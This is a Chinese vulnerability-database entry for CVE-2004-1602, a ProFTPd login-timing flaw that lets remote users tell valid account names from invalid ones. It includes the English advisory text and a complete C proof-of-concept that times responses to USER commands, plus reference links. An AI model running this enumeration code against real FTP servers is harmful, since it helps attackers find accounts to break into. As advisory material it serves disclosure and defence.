ProFTPd登录时间差异用户帐户泄露漏洞

ProFTPd登录时间差异用户帐户泄露漏洞

漏洞ID 1108228 漏洞类型 设计错误
发布时间 2004-10-17 更新时间 2005-10-20
图片[1]-ProFTPd登录时间差异用户帐户泄露漏洞-安全小百科CVE编号 CVE-2004-1602
图片[2]-ProFTPd登录时间差异用户帐户泄露漏洞-安全小百科CNNVD-ID CNNVD-200410-018
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/581
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200410-018
|漏洞详情
ProFTPd是一款流行的FTP服务程序。ProFTPd在处理’USER’命令时对非法用户名处理存在时间差异,远程攻击者可以利用这个漏洞验证合法用户帐户名。LSSSecurityTeam报告通过对ProFTPd登录过程进行代码执行路径时间分析,可判断合法用户帐户名。远程用户估量传输’USER’命令和应答时间的差异,可判断帐户是否合法。
|漏洞EXP
/* 
Details 
Vulnerable Systems:
* ProFTPD Version 1.2.10 and below

It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.

Proof of Concept Code:
LSS has developed simple PoC exploit that is presented here:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploitn"
" Coded by Leon / LSS Securityn"
">-------------------------------------<n");

if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: ");
n = read (sock,buf2, sizeof(buf2));
for (y=0;y<PROBE;y++) {
gettimeofday (&tv,&tz);
snprintf (buf, sizeof(buf)-1,"USER %srn",argv[2]);
write (sock, buf, strlen(buf));
n = read (sock,buf2, sizeof(buf2));
gettimeofday (&tv2,&tz2);
dist =tv2.tv_usec - tv.tv_usec;
stat += dist;
printf (" %d |",dist);
}
printf ("nAvrg: %dn",(stat/PROBE));
close (sock);
}

// milw0rm.com [2004-10-17]
|参考资料

来源:SECTRACK
名称:1011687
链接:http://securitytracker.com/id?1011687
来源:security.lss.hr
链接:http://security.lss.hr/index.php?page=details&ID;=LSS-2004-10-02
来源:BUGTRAQ
名称:20041015ProFTPD1.2.xremoteusersenumerationbug
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109786760926133&w;=2
来源:XF
名称:proftpd-info-disclosure(17724)
链接:http://xforce.iss.net/xforce/xfdb/17724
来源:BID
名称:11430
链接:http://www.securityfocus.com/bid/11430

相关推荐: MondoSoft MondoSearch Multiple Vulnerabilities

MondoSoft MondoSearch Multiple Vulnerabilities 漏洞ID 1098738 漏洞类型 Unknown 发布时间 2004-04-02 更新时间 2004-04-02 CVE编号 N/A CNNVD-ID N/A 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享